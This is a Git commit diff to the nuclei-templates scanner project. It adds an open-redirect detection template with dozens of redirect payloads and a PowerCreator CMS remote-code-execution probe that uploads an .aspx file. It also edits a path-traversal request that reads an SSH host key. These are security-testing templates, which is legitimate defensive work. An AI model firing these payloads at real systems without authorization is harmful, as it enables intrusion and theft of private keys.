Merge pull request #11 from projectdiscovery/master

Updation
patch-1
Dhiyaneshwaran 2021-02-14 19:13:11 +05:30 committed by GitHub
commit 21f8a6c51f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
5 changed files with 100 additions and 33 deletions

View File

@ -34,7 +34,7 @@ An overview of the nuclei template directory including number of templates assoc
| fuzzing | 4 | helpers | 2 | | fuzzing | 4 | helpers | 2 |
| miscellaneous | 12 | misconfiguration | 43 | | miscellaneous | 12 | misconfiguration | 43 |
| takeovers | 1 | technologies | 45 | | takeovers | 1 | technologies | 45 |
| vulnerabilities | 81 | workflows | 18 | | vulnerabilities | 82 | workflows | 18 |
**Tree structure of nuclei templates:** **Tree structure of nuclei templates:**
@ -524,8 +524,8 @@ An overview of the nuclei template directory including number of templates assoc
│   │   ├── basic-cors.yaml │   │   ├── basic-cors.yaml
│   │   ├── basic-xss-prober.yaml │   │   ├── basic-xss-prober.yaml
│   │   ├── crlf-injection.yaml │   │   ├── crlf-injection.yaml
│   │   ├── top-xss-params.yaml │   │   ├── open-redirect.yaml
│   │   └── url-redirect.yaml │   │   └── top-xss-params.yaml
│   ├── ibm │   ├── ibm
│   │   ├── eclipse-help-system-xss.yaml │   │   ├── eclipse-help-system-xss.yaml
│   │   └── ibm-infoprint-directory-traversal.yaml │   │   └── ibm-infoprint-directory-traversal.yaml
@ -565,6 +565,7 @@ An overview of the nuclei template directory including number of templates assoc
│   │   ├── nginx-module-vts-xss.yaml │   │   ├── nginx-module-vts-xss.yaml
│   │   ├── nuuo-nvrmini2-rce.yaml │   │   ├── nuuo-nvrmini2-rce.yaml
│   │   ├── pdf-signer-ssti-to-rce.yaml │   │   ├── pdf-signer-ssti-to-rce.yaml
│   │   ├── powercreator-cms-rce.yaml
│   │   ├── rce-shellshock-user-agent.yaml │   │   ├── rce-shellshock-user-agent.yaml
│   │   ├── rce-via-java-deserialization.yaml │   │   ├── rce-via-java-deserialization.yaml
│   │   ├── rconfig-rce.yaml │   │   ├── rconfig-rce.yaml
@ -637,7 +638,7 @@ An overview of the nuclei template directory including number of templates assoc
</details> </details>
**56 directories, 534 files**. **56 directories, 535 files**.
📖 Documentation 📖 Documentation
----- -----

View File

@ -19,7 +19,7 @@ requests:
Connection: close Connection: close
- | - |
GET endpoint../../../../bin/.ssh_host_rsa_key HTTP/1.1 GET §endpoint§../../../../bin/.ssh_host_rsa_key HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Accept: */* Accept: */*
Cache-Control: max-age=0 Cache-Control: max-age=0

View File

@ -0,0 +1,50 @@
id: open-redirect
info:
name: Open URL redirect detection
author: afaq & @melbadry9 & @Elmahdi & @pxmme1337 & @Regala_ & @andirrahmani1 & @geeknik
severity: low
description: A user-controlled input redirect users to an external website.
tags: redirect
requests:
- method: GET
path:
- '{{BaseURL}}/test.com/'
- '{{BaseURL}}/test.com//'
- '{{BaseURL}}///;@test.com'
- '{{BaseURL}}///test.com/%2F..'
- '{{BaseURL}}/////test.com'
- '{{BaseURL}}//test.com/%2F..'
- '{{BaseURL}}//test.com/..;/css'
- '{{BaseURL}}/test%E3%80%82com'
- '{{BaseURL}}/%5Ctest.com'
- '{{BaseURL}}test.com'
- '{{BaseURL}}/test.com'
- '{{BaseURL}}\test.com'
- '{{BaseURL}}//test.com/'
- '{{BaseURL}}\/\/test.com/'
- '{{BaseURL}}%00\/\/test.com/'
- '{{BaseURL}}/%00/test.com/'
- '{{BaseURL}}/%09/test.com/'
- '{{BaseURL}}/%0a/test.com/'
- '{{BaseURL}}/%0d/test.com/'
- '{{BaseURL}}////test.com/%2f%2e%2e'
- '{{BaseURL}}/%5ctest.com/%2f%2e%2e'
- '{{BaseURL}}@test.com'
- '{{BaseURL}}/{{BaseURL}}test.com'
- '{{BaseURL}}\{{BaseURL}}test.com'
- '{{BaseURL}}//{{BaseURL}}test.com/'
- '{{BaseURL}}\/\/{{BaseURL}}test.com/'
- '{{BaseURL}}%00\/\/{{BaseURL}}test.com/'
- '{{BaseURL}}////{{BaseURL}}test.com/%2f%2e%2e'
- '{{BaseURL}}/%5c{{BaseURL}}test.com/%2f%2e%2e'
- '{{BaseURL}}/〱{{BaseURL}}test.com/%2f%2e%2e'
- '{{BaseURL}}@{{BaseURL}}test.com'
- '{{BaseURL}}/?page=test.com&_url=test.com&callback=test.com&checkout_url=test.com&content=test.com&continue=test.com&continueTo=test.com&counturl=test.com&data=test.com&dest=test.com&dest_url=test.com&dir=test.com&document=test.com&domain=test.com&done=test.com&download=test.com&feed=test.com&file=test.com&host=test.com&html=test.com&http=test.com&https=test.com&image=test.com&image_src=test.com&image_url=test.com&imageurl=test.com&include=test.com&langTo=test.com&media=test.com&navigation=test.com&next=test.com&open=test.com&out=test.com&page=test.com&page_url=test.com&pageurl=test.com&path=test.com&picture=test.com&port=test.com&proxy=test.com&redir=test.com&redirect=test.com&redirectUri=test.com&redirectUrl=test.com&reference=test.com&referrer=test.com&req=test.com&request=test.com&retUrl=test.com&return=test.com&returnTo=test.com&return_path=test.com&return_to=test.com&rurl=test.com&show=test.com&site=test.com&source=test.com&src=test.com&target=test.com&to=test.com&uri=test.com&url=test.com&val=test.com&validate=test.com&view=test.com&window=test.com&redirect_to=test.com'
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?test\.com(?:\s*?)$'
part: header

View File

@ -1,28 +0,0 @@
id: open-redirect
info:
name: Open redirect Detection
author: melbadry9 & Elmahdi & @pxmme1337 & @Regala_ & @andirrahmani1 & geeknik
severity: low
description: A user-controlled input redirect users to an external website.
tags: redirect
requests:
- method: GET
path:
- "{{BaseURL}}/evil.com/"
- "{{BaseURL}}/evil.com//"
- "{{BaseURL}}///;@evil.com"
- "{{BaseURL}}///evil.com/%2F.."
- "{{BaseURL}}/////evil.com"
- "{{BaseURL}}//evil.com/%2F.."
- "{{BaseURL}}//evil.com/..;/css"
- "{{BaseURL}}/evil%E3%80%82com"
- "{{BaseURL}}/%5Cevil.com"
- "{{BaseURL}}/?Page=evil.com&_url=evil.com&callback=evil.com&checkout_url=evil.com&content=evil.com&continue=evil.com&continueTo=evil.com&counturl=evil.com&data=evil.com&dest=evil.com&dest_url=evil.com&dir=evil.com&document=evil.com&domain=evil.com&done=evil.com&download=evil.com&feed=evil.com&file=evil.com&host=evil.com&html=evil.com&http=evil.com&https=evil.com&image=evil.com&image_src=evil.com&image_url=evil.com&imageurl=evil.com&include=evil.com&langTo=evil.com&media=evil.com&navigation=evil.com&next=evil.com&open=evil.com&out=evil.com&page=evil.com&page_url=evil.com&pageurl=evil.com&path=evil.com&picture=evil.com&port=evil.com&proxy=evil.com&redir=evil.com&redirect=evil.com&redirectUri=evil.com&redirectUrl=evil.com&reference=evil.com&referrer=evil.com&req=evil.com&request=evil.com&retUrl=evil.com&return=evil.com&returnTo=evil.com&return_path=evil.com&return_to=evil.com&rurl=evil.com&show=evil.com&site=evil.com&source=evil.com&src=evil.com&target=evil.com&to=evil.com&uri=evil.com&url=evil.com&val=evil.com&validate=evil.com&view=evil.com&window=evil.com&redirect_to=evil.com"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?evil\.com(?:\s*?)$'
part: header

View File

@ -0,0 +1,44 @@
id: powercreator-cms-rce
info:
name: PowerCreator CMS RCE
author: pikpikcu
severity: critical
reference: http://www.mstir.cn/index.php/2020/11/18/powercreatorcms-rce/
tags: rce,powercreator
requests:
- raw:
- |
POST /upload/UploadResourcePic.ashx?ResourceID=8382 HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 225
Content-Disposition: form-data;name="file1";filename="poc.aspx";
Content-Type: multipart/form-data; boundary=---------------------------20873900192357278038549710136
-----------------------------20873900192357278038549710136
Content-Disposition: form-data; name="file1"; filename="poc.aspx"
Content-Type: image/jpeg
Poc_Test
-----------------------------20873900192357278038549710136--
- |
GET /ResourcePic/{{endpoint}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: gzip
extractors:
- type: regex
name: endpoint
internal: true
part: body
regex:
- "(.*?.ASPX)"
matchers:
- type: dsl
dsl:
- "contains(body, 'Poc_Test') == true && status_code == 200"